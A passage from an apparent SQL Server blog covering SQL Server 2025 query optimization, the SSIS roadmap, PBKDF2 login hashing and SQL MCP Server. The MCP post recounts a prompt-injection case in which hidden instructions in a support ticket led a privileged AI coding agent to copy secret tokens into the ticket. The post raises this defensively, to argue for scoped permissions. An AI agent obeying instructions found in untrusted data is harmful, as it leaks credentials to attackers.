OPPO currently works cleanly when you have exactly one optional parameter. Brent Ozar tested this thoroughly — if you haven't read his writeup on OPPO, you should check it out — and his conclusion is blunt: OPPO helps if your query has exactly one, and only one, optional parameter. Any more than that, and it looks like we're still managing these ourselves. That's not a knock on the feature. It's the same story PSPO told when it shipped in 2022 — limited initial scope, promising foundation, gradual investment over time. OPPO looks like it's following the same trajectory.

The kitchen-sink stored procedure with six optional search parameters? The one that's been the bane of your existence for yeeeears? OPPO doesn't fully solve that yet. What it does solve is the simpler, single-parameter case, and it solves it automatically without code changes, plan guides, or OPTION (RECOMPILE) scattered everywhere.

That's not nothing. That's actually pretty good.

What This Means for Your Upgrade Decision

OPPO alone isn't a reason to upgrade to SQL Server 2025. But it is one more item in a growing list of query improvements that could collectively make a real difference for any environment plagued with parameter sniffing problems.

Here's what to actually do before and after you upgrade:

Before the upgrade

Run sp_BlitzCache against your current environment and pull your top queries by parameter sniffing complaints. Document what you find. If you've been following along here, you already know how to do this — and you know how to hand that output to an AI and get a plain-English diagnosis of what's wrong and why.

After moving to compatibility level 170

Run it again. Compare. You want to know which queries OPPO picked up, which ones PSPO is handling, and which ones are still on you. Query Store could be your friend here. Capture baselines before the compatibility level change, not after.

Watch for plan shifts

OPPO can cause plan shifts on queries that were previously stable. 'Better' is the intent, but 'different' is what you'll see first, and different requires validation. Test your workload under compatibility level 170 in a non-production environment before you cut over.

Don't assume the multi-parameter case is handled

If you have stored procedures with two or more optional parameters, verify OPPO is actually helping them — don't assume. The other workarounds that you've been using — dynamic SQL, OPTION (RECOMPILE), OPTIMIZE FOR — are all still valid and still necessary in those cases.

The Bigger Picture

What I find genuinely interesting about OPPO isn't just the feature itself — it's what it represents. For years, parameter sniffing diagnosis has required a DBA who knows what to look for, a tool like sp_BlitzCache to surface it, and enough experience to connect the symptom to the cause. We just spent six posts exploring how well AI can take that sp_BlitzCache output and walk through the diagnosis. Now the engine itself is starting to detect and route around certain classes of the problem before it ever becomes a symptom.

That's a meaningful shift. It does not replace the DBA, but it does mean that some of the lowest-hanging parameter sniffing fruit gets handled automatically, which frees you up to focus on the harder cases — the ones where the data distribution is genuinely complicated, the procedure design is the real problem, or the fix requires a rewrite rather than a hint.

SQL Server is getting smarter about query execution. Slowly, incrementally, version by version. OPPO is one more step in that direction. It's not finished, but it's definitely real.

More to Read

Optional Parameter Plan Optimization — Microsoft Learn
How SQL Server 2025's Optional Parameter Plan Optimization Works — Brent Ozar
Parameter Sensitive Plan Optimization — Microsoft Learn
sp_BlitzCache + ChatGPT: I'm Convinced — sqlfingers.com

Wednesday, March 18, 2026

SQL Server MCP: The Bridge Between Your Database and AI

AI is inside your SQL Server now. I don't mean that it's knocking or that it's on the horizon. It is already there. Microsoft calls it SQL MCP Server — their open-source solution for bringing AI agents directly into your data workflows. If you haven't heard of MCP yet, keep reading. If you've got developers in-house, there's a reasonable chance that it's already running in your environment and you should know about it.

What Is MCP

MCP stands for Model Context Protocol. Anthropic introduced it in late 2024 as an open standard for connecting AI agents to external tools and data sources. Think of it as an open-source USBC port for AI where the goal is standardization. Meant to solve the problem where every AI model needs its own connector by creating a standard interface for AI data integration.

Microsoft shipped SQL MCP Server as part of Data API Builder (DAB) version 1.7. When configured, the agent calls a defined, typed tool and the server executes a controlled operation against the entities you've explicitly configured, such as read_records, create_record, update_record and delete_record. No raw query generation. No credentials handed to a chatbot.

By plugging your SQL Server into an MCP port, the AI stops guessing what your data looks like and starts interacting with it in real-time. Yes. I said real-time. The MCP turns your AI from a chatbot that's just talking into a virtual DBA that actually works across your live data. It’s like giving AI its own connection string and a read-only — or write-ready — seat at the table.

That Agent configuration is key. You define what is exposed and you set the permissions. This gives AI a controlled surface rather than just a wide open door.

A Good Example

Your client's helpdesk team spends twenty minutes every day copying order status details from SSMS into emails. You set up the SQL MCP Server, expose the Orders and Customers views with read-only permissions for the helpdesk role, and connect it to GitHub Copilot. Now the helpdesk user types: 'Show me all open orders for Acme Corp placed in the last 30 days' — and receives a formatted result in seconds, without touching SSMS or knowing a line of T-SQL, and without having access to anything outside those two views. You've built a controlled and very manageable bridge between AI and your data layer that can be used with natural language to query data and output the desired resultset.

A Dangerous Example

A developer on your team is testing an AI coding agent. They want to be able to query the database while developing, so they point it at SQL Server using their account which is an administrator, and they expose all tables 'just to keep it simple'. This MCP setup using an over-privileged account inherits classic SQL-injection risks, which can escalate into full data destruction or exfiltration.

This isn't a hypothetical pattern. In July 2025, researchers at General Analysis documented a real attack scenario involving Supabase's MCP implementation. A developer was using Cursor — an AI coding agent — connected to their Supabase database via MCP with a privileged service_role key, which bypassed all row-level security by design. An attacker filed a support ticket containing hidden instructions embedded in the ticket text. When the developer asked the agent to review the latest open tickets, the agent read the attacker's message and interpreted the embedded instructions as commands — querying the private integration_tokens table and writing the contents back into the support ticket thread. The attacker refreshed the ticket and read their targets' credentials in plain text. The database executed every query correctly. It had no way to know the request came from a compromised agent rather than an authorized service. Too much access + Untrusted input = Accident waiting to happen.

What's Already Out There

Erik Darling's free SQL Server Performance Monitor shipped in February 2026 with a built-in MCP server. Enable it in settings, connect any MCP-compatible AI client, and ask natural language questions about CPU, waits, blocking, and query performance against your own collected monitoring data. Erik uses Claude, but the MCP server works with any LLM that supports the protocol. This is the lowest-risk, highest-value starting point for any DBA curious about what MCP actually feels like in practice.

Google launched managed MCP servers for Cloud SQL — including SQL Server — in early 2026. Microsoft has its own path through DAB. Both major cloud vendors are shipping this in production. It is not a preview feature anymore.

What You Need to Think About

Scope the permissions like your job depends on it.

Because it might. Microsoft's own security guidance on MCP flags over-permissioned servers as a primary risk. An MCP server should have access scoped exactly to what the agent needs. Nothing more. Specific entities, read-only wherever possible, a dedicated low-privilege login. Not a sysadmin. Not a service account recycled from something else. A purpose-built login with the minimum access to do the job.

Untrusted data in, bad instructions out.

If your AI agent reads from a table that users can write to, an attacker writing to that table could potentially influence what the agent does next. This is called Prompt Injection, and is ranked as the number one security risk for LLM applications by OWASP. This is an architectural vulnerability which allows attackers to bypass AI safety guardrails. Keep AI agents away from data sources that mix trusted operations with untrusted user input.

Find out what's already running.

MCP is easy to set up. That's a feature and a risk. Before implementing, you should audit what your developers are already running. A developer who found a GitHub repo with an MSSQL MCP server config and a five-minute setup guide may already have something pointed at a dev database — which have production data in them more often than people admit.

Know where the data goes.

When your AI tool processes a query result, that result travels to wherever the model is running. If you're using a cloud-hosted LLM like Anthropic, OpenAI or Google, your query results are leaving your network. For monitoring or diagnostics data, this is probably acceptable. For customer data, financial records, or anything regulated, your legal team will have opinions about this.

So, Should You Set It Up?

For monitoring and diagnostics, yes. Erik Darling's Performance Monitor is the right first step — self-contained, read-only against monitoring data, nothing leaves your network. Low risk. Immediately useful. A good way to see what AI + SQL Server MCP actually feels like before committing to anything bigger.

For exposing production application data to AI agents, we must treat it like any other integration project: defined scope, purpose-built service account, explicit entity configuration, and a conversation with whoever manages your security. The technology is ready. The governance discussion in most shops hasn't been held yet.

Coming Up

In the next post, I'll walk through setting up the SQL MCP Server locally using Data API Builder — from a working dab-config.json to a live connection with an AI client — so you can see exactly what a controlled, scoped MCP setup looks like in practice.

More to Read:

SQL MCP Server Overview — Microsoft Learn
Free SQL Server Performance Monitoring — Erik Darling
Understanding and Mitigating Security Risks in MCP Implementations — Microsoft Community Hub
Managed MCP Servers for Google Cloud Databases — Google Cloud Blog

Tuesday, March 17, 2026

SSIS Is Not Dead. Yet.

SSRS is gone. SQL Server 2025 shipped without it — the first version to drop SSRS entirely, with Power BI Report Server (PBIRS) as the named replacement. But what about SSIS?

There is no EOL yet, but the signals are clear. SSIS is being phased out in favor of Microsoft Fabric, which is positioned as the next-generation unified analytics platform. Look at that. They don't even call it 'ETL' anymore. Again, it's not gone yet, but Microsoft is encouraging the modernization of ETL workloads to Fabric to address the limitations of on-premise SSIS infrastructure, such as limited scalability and high maintenance overhead.

We've been here before. DTS became SSIS with SQL Server 2005 — Yukon, for those of us who were there. I was. [Thank you, Donald Farmer!] The transition wasn't a cliff either. It was deprecation notices, a long runway, and then one day DTS was just gone. The difference this time is that the runway leads to the cloud.

SSIS 2025 Shipped. Read the Fine Print.

SSIS 2025 is generally available, bundled with SQL Server 2025. Microsoft announced it at Ignite in November 2025 within the Microsoft Fabric Blog, not the SQL Server blog. That's not an accident.

Here's what shipped with SSIS 2025 — the full picture, not just the press release version.

The one new feature:

The ADO.NET connection manager now supports the Microsoft SqlClient Data Provider, with Microsoft Entra ID authentication and TLS 1.3 support. That's it. One new feature in the entire release.

What's deprecated:

Legacy Integration Services Service — the service that lets SSMS monitor packages stored in the SSIS Package Store or msdb. Not a big deal if you've migrated to the SSIS Catalog (SSISDB), but if you're still on the package deployment model, this will matter.

32-bit execution mode. SSMS 21 and SSIS Projects 2022 are 64-bit only going forward. If you have custom or third-party components that are 32-bit only, they break.

SqlClient Data Provider (SDS) connection type. The recommendation is to migrate to the ADO.NET connection type.

What's been removed entirely:

CDC components by Attunity and CDC service for Oracle by Attunity — gone. If you're using these for change data capture from Oracle, you need a replacement. Now.

Microsoft Connector for Oracle — also gone. Support ended July 2025. Not available in SQL Server 2025 onward.

Hadoop components — Hadoop Hive Task, Hadoop Pig Task, Hadoop File System Task — removed.

The breaking change nobody talks about:

The Microsoft.SqlServer.Management.IntegrationServices assembly now depends on Microsoft.Data.SqlClient instead of System.Data.SqlClient. If you have PowerShell scripts, C# automation, or deployment tooling that instantiates the IntegrationServices object, those scripts will break without updates. This one is quiet, easy to miss, and will bite you during your first post-upgrade deployment.

Where Microsoft Is Pointing

The official migration path is Microsoft Fabric Data Factory. SSIS lift-and-shift in Fabric is currently in private preview. That is the ability to run existing SSIS packages inside a Fabric workspace without rewriting them. Microsoft's framing is 'bridge, not cliff,' and that's fair. But a bridge going one direction is still a one-way bridge.

For what it's worth, SQL Server 2022 extended support runs to January 11, 2033, and SSIS goes with it. But that's seven years, not forever, and migrations of complex SSIS estates take longer than people expect.

What You Should Actually Do Right Now

Nobody is forcing you off SSIS today, but here's what's worth doing now, before anything becomes urgent:

Know what you have.

Inventory your SSIS packages. How many are there? Where are they deployed — SSIS Catalog, msdb, file system? Which ones use Oracle connectors, CDC components, or 32-bit custom components? If you can't answer those questions, you can't plan.

Check your automation scripts.

If anything in your environment uses Microsoft.SqlServer.Management.IntegrationServices — PowerShell deployment scripts, CI/CD pipelines, custom monitoring — verify it's referencing Microsoft.Data.SqlClient before you upgrade to SQL Server 2025. This is the most likely silent failure on upgrade day.

Identify your Oracle-dependent packages.

The Microsoft Connector for Oracle is gone in SSIS 2025. If you're upgrading SQL Server and you have packages using that connector, they will not work. Third-party alternatives exist — ADO.NET components, KingswaySoft, and others — but you need to know which packages are affected before upgrade day, not after.

Don't migrate to Fabric yet just because Microsoft says to.

Fabric Data Factory is a genuinely different product. It's cloud-native, SaaS, and not a drop-in replacement for on-premises SSIS. The lift-and-shift option in private preview is promising, but it's still preview. For production ETL workloads, 'let's move to Fabric' is a project, not a setting. Treat it that way.

So, Is SSIS Next?

Brent Ozar asked this question in June 2025. The community answered the SSRS half loudly. The SSIS half got quiet. Here's my answer.

No EOL date has been announced. SSIS 2025 shipped, which means Microsoft is still investing in it — just barely, and clearly with both eyes on Fabric. The trajectory is obvious even if the timeline isn't. SSRS got a clean announcement and a named replacement. SSIS is getting a slower walk toward the exit, with a Fabric-shaped door at the end of the hallway.

I think Brent put it well in his comments: without a fully on-premises replacement for SSIS, Microsoft can't make a clean announcement the way they did with SSRS. The closest thing on-premise shops have is a self-hosted integration runtime — but the control still depends on the cloud.

For now: don't panic, do inventory, review your automation scripts, and watch what happens with SSIS lift-and-shift in Fabric once it goes GA. That's when the real Fabric migration conversation starts. Let me know how I can help.

More to Read:

What's New in Integration Services in SQL Server 2025 — Microsoft Learn
The Evolution of SSIS: SSIS 2025 Generally Available — Microsoft Fabric Blog
SSIS Microsoft Connector for Oracle Deprecation — Microsoft SQL Server Blog
SQL Server 2022 Lifecycle — Microsoft Learn

Monday, March 16, 2026

SQL Server 2025 Slowed Down Your Logins. Intentionally.

You upgraded to SQL Server 2025. Your SQL auth logins are slower. This is not a bug. Microsoft did this on purpose — which is actually good news, but if you're not using connection pooling, it's not going to feel very good.

What Changed

Prior to SQL Server 2025, SQL login passwords were hashed using SHA-512 with a random salt — one pass. Fast to verify, which is exactly what attackers love.

SQL Server 2025 switches to PBKDF2 (RFC 2898) as the default hashing algorithm. Same SHA-512 underneath, but now the password is hashed 100,000 times in a loop. This is the standard recommended by NIST SP 800-63B for password-based authentication, and Microsoft confirms it in their SQL Server 2025 security overview.

You can see the difference in the hash itself. Run this on both versions:

SELECT PWDENCRYPT('MyPassword123');

Pre-2025 hashes start with 0x0200. SQL Server 2025 hashes start with 0x0300. That version byte tells you what you've got. Same function. Completely different work going on behind the scenes.

How to Measure the Impact

The key here is to pre-generate the hash first, then time only the verification step to mimic what's actually happening at login.

-- Step 1: pre-generate the hash (not timed)
DECLARE @hash VARBINARY(256) = PWDENCRYPT('MyPassword123');

-- Step 2: time only the verification
DECLARE @start DATETIME2 = SYSDATETIME();

SELECT PWDCOMPARE('MyPassword123', @hash) AS PasswordMatch;

SELECT DATEDIFF(MILLISECOND, @start, SYSDATETIME()) AS ElapsedMs;

No special permissions required — any login that can connect and run a basic SELECT can run this. And the password you pass in is just a string; it has nothing to do with your own login or any existing account on the instance.

Run it on SQL Server 2022 first, then 2025. The difference is immediate. On 2022, you'll see 0ms — single-pass SHA-512 is too fast for millisecond precision to capture. On 2025, the result is hardware-dependent. PBKDF2 is intentionally single-threaded and CPU-bound, so your number will reflect your server's single-core performance. VladDBA measured approximately 150ms on his test environment. On my 2025 instance, I got 229ms. Your number will be your number — run it and find out.

Version Algorithm Iterations ElapsedMs (sample)
SQL Server 2012–2022 SHA-512 + salt 1 0ms
SQL Server 2025 (VladDBA) PBKDF2 / SHA-512 100,000 ~150ms
SQL Server 2025 (sqlfingers) PBKDF2 / SHA-512 100,000 ~229ms

But Here's the Other Side

That overhead isn't Microsoft being careless. It's intentional friction — and it hits attackers far harder than it hits your app.

VladDBA ran the numbers on password brute-forcing. On SQL Server 2022, a password audit script cracked a set of hashes in about 45 seconds. On SQL Server 2025 with PBKDF2, the same workload is estimated at 154,008 seconds — roughly 42 hours. Same hardware, same wordlist. The only difference is the hash algorithm. That is not a small point.

Microsoft acknowledges the login latency tradeoff directly on the SQL Server 2025 Known Issues page. They call it out, they're not hiding it.

What You Should Do

Check whether your applications are using connection pooling. If they are, the per-login overhead happens once per pool connection establishment, not on every request — and you're probably going to be fine. If they're not pooling, or if you're running scripts, jobs, or monitoring tools that open a fresh SQL auth connection on every execution, this IS going to surface. Without question.

Existing logins migrate automatically on first successful authentication.

SQL logins created before the upgrade retain their 0x0200 hash until they authenticate for the first time against the upgraded instance. At that point, SQL Server silently rehashes the password under PBKDF2 and stores the new 0x0300 hash going forward. This works because authentication is the only moment SQL Server has access to the plaintext password. Any login that never authenticates post-upgrade will retain its old hash indefinitely. If you want to confirm which logins are still on the old algorithm, check the hash header in sys.sql_logins:

SELECT name,
       CONVERT(VARBINARY(2), password_hash) AS HashVersion
FROM   sys.sql_logins
WHERE  type = 'S'
AND    password_hash IS NOT NULL;

0x0200 = old. 0x0300 = PBKDF2. Simple as that.

Kerberos and Windows auth are unaffected.

This only applies to SQL authentication. If your environment uses Windows auth or Kerberos throughout, none of this touches you.

There's an undocumented trace flag.

Community discussion on Microsoft Learn surfaced startup parameter -T4671 as a way to revert to pre-2025 hashing behavior. Note that TF 4671 reversed meaning between versions — in SQL Server 2022 it enabled iterative hashing; in 2025 it appears to disable it. This is undocumented and unsupported. I'm mentioning it because you'll see it discussed, not because I'm recommending it.

More to Read:

SQL Server 2025 Known Issues — Microsoft Learn
Secure by Default: What's New in SQL Server 2025 Security — Microsoft Community Hub
Looking into SQL Server 2025's new PBKDF2 hashing algorithm — VladDBA
NIST SP 800-63B Digital Identity Guidelines